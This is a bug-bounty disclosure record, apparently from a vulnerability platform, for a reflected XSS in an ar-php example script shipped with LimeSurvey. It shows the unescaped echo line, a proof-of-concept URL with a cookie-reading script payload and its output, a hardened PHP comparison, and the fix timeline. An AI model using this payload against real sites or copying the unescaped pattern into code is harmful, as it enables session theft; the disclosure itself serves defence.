Reflected XSS in LimeSurvey in limesurvey/limesurvey

Valid

Reported on

Mar 28th 2023


Description

There is a reflected XSS in LimeSurvey. The $_GET['keyword'] parameter (in the bundled ar-php example script ar_query.php, see the PoC URL below) is echoed into the HTML response without sanitization:

echo $_GET['keyword'];
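The vulnerable pattern beside a hardened version, as an added example that is not LimeSurvey's or ar-php's own code; the function names and the sample input are constructed for illustration, and the fix is output encoding for the HTML body context with htmlspecialchars():

```php
<?php
// Added example (not LimeSurvey's or ar-php's code): reflecting a raw query
// parameter versus HTML-encoding it before it reaches the response body.
declare(strict_types=1);

// Vulnerable: the raw parameter goes straight into the HTML output,
// which is the pattern reported above (echo $_GET['keyword'];).
function renderKeywordUnsafe(array $get): string
{
    return 'Results for: ' . ($get['keyword'] ?? '');
}

// Hardened: encode for the HTML body context. ENT_QUOTES also covers
// attribute values, ENT_SUBSTITUTE avoids returning an empty string on
// invalid UTF-8, and the charset is stated explicitly.
function renderKeywordSafe(array $get): string
{
    $keyword = (string) ($get['keyword'] ?? '');
    return 'Results for: '
        . htmlspecialchars($keyword, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed input: the report's payload as it arrives after URL decoding.
$sample = ['keyword' => '<script>alert(document.cookie)</script>'];

// The unsafe renderer emits a live <script> tag; the safe one emits only text.
assert(str_contains(renderKeywordUnsafe($sample), '<script>'));
assert(!str_contains(renderKeywordSafe($sample), '<script>'));
// Encoded output: Results for: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
echo renderKeywordSafe($sample), PHP_EOL;
```

str_contains() requires PHP 8. Marking session cookies HttpOnly keeps them out of document.cookie but does not remove the injection itself, so the encoding fix is still required.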

Proof of Concept

We can read cookie contents: http://localhost/limesurvey/vendor/khaled.alshamaa/ar-php/examples/ar_query.php?keyword=%3Cscript%3Ealert(document.cookie)%3C/script%3E&submit=%D8%A8%D8%AD%D8%AB+%28Go%29&mode=0

Output:

csrftoken=Aj9xpc4O3p8Se553QLJNlhsFTUgJ3cCp; mode=light

Impact

With this XSS, an attacker can read the victim's cookies (as shown above) and send requests in the victim's browser context ...

We are processing your report and will contact the limesurvey team within 24 hours. 2 months ago
We have contacted a member of the limesurvey team and are waiting to hear back 2 months ago
Carsten Schmitz modified the Severity from High (8.2) to High (7.9) 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Carsten Schmitz validated this vulnerability 2 months ago
peymankf has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carsten Schmitz marked this as fixed in 5.6.14 with commit d47fe8 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Apr 3rd 2023
Carsten Schmitz published this vulnerability 2 months ago